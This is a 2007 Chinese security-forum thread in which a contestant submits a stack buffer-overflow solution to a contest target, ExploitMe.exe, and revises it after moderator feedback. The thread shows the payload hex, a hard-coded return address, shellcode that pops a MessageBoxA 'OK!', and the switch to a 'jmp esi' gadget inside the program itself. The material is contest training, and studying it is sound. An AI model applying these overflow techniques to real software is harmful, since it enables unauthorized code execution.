首页
社区
课程
招聘
[原创]第二阶段第一题 答案提交
发表于: 2007-8-28 15:16 10848

[原创]第二阶段第一题 答案提交

2007-8-28 15:16
10848
收藏
免费 0
支持
分享
最新回复 (13)
雪    币: 109
活跃值: (10)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
2
原来是大写的,还有个感叹号 :(

改三个字节就行了。
上传的附件:
2007-8-28 15:22
0
雪    币: 109
活跃值: (10)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
3
其实第二次提交和第一次原理一样的:
Offset      0  1  2  3  4  5  6  7   8  9 10 11 12 13 14 15

00000000   B5 33 00 00 99 14 00 00  4F 4B 21 00 00 00 00 00   µ3..™...OK!.....
00000016   83 EC 2C 6A 00 8D 44 24  04 50 50 6A 00 E8 F8 09   ƒì,j.D$.PPj.èø.
00000032   32 7E 83 C4 4C 5D C3 00  00 00 00 00 00 00 00 00   2~ƒÄL]Ã.........
00000048   80 FB 12 00                                        €û..

偏移 8,9,10 处是 "ok" 字符串,第一次提交写的是小写,第二次改成大写,后面加了个
感叹号 (0x21).
2007-8-28 15:28
0
雪    币: 109
活跃值: (10)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
4
溢出后返回到堆栈一个地址。这个地址我是硬编码进去的,希望在其它机器上这个值一样。
2007-8-28 15:38
0
雪    币: 109
活跃值: (10)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
5
溢出后返回到的地址:12FB80

ShellCode 代码:

0012FB80    83EC 2C         SUB ESP,2C
0012FB83    6A 00           PUSH 0
0012FB85    8D4424 04       LEA EAX,DWORD PTR SS:[ESP+4]
0012FB89    50              PUSH EAX
0012FB8A    50              PUSH EAX
0012FB8B    6A 00           PUSH 0
0012FB8D    E8 F809327E     CALL USER32.MessageBoxA
0012FB92    83C4 4C         ADD ESP,4C
0012FB95    5D              POP EBP
0012FB96    C3              RETN
2007-8-28 15:40
0
雪    币: 50161
活跃值: (20625)
能力值: (RANK:350 )
在线值:
发帖
回帖
粉丝
6
单击按钮后,直接崩溃
2007-8-28 15:43
0
雪    币: 109
活跃值: (10)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
7
还能再提交吗? 最后一次,没其它环境测试。
上传的附件:
2007-8-28 17:25
0
雪    币: 50161
活跃值: (20625)
能力值: (RANK:350 )
在线值:
发帖
回帖
粉丝
8
还是没通过,直接崩溃。
你思路有问题,这题可以做到与系统无关的。
2007-8-28 17:31
0
雪    币: 109
活跃值: (10)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
9
我知道了。我选择了 kernel32.dll 中的 jmp esi. 应该选择 ExploitMe.exe 里的

jmp esi.

算了,已经满两次了。
2007-8-28 17:33
0
雪    币: 50161
活跃值: (20625)
能力值: (RANK:350 )
在线值:
发帖
回帖
粉丝
10
你可能没细看规则,附件可以允许多次提交的,只是每提交一次,减5分。
2007-8-28 18:27
0
雪    币: 109
活跃值: (10)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
11
哦.理解错了.我以为只能两次.

再次提交. 这个应该正常,且可以反复溢出.
上传的附件:
2007-8-28 19:17
0
雪    币: 846
活跃值: (221)
能力值: (RANK:570 )
在线值:
发帖
回帖
粉丝
12
验证通过~~
2007-8-28 19:57
0
雪    币: 109
活跃值: (10)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
13
总算过了. Thanks~~

受益非浅. 期待后面的题目更精彩
2007-8-28 21:30
0
雪    币: 846
活跃值: (221)
能力值: (RANK:570 )
在线值:
发帖
回帖
粉丝
14
123.1518639034595146348511616371
2007-9-2 21:18
0
游客
登录 | 注册 方可回帖
返回
//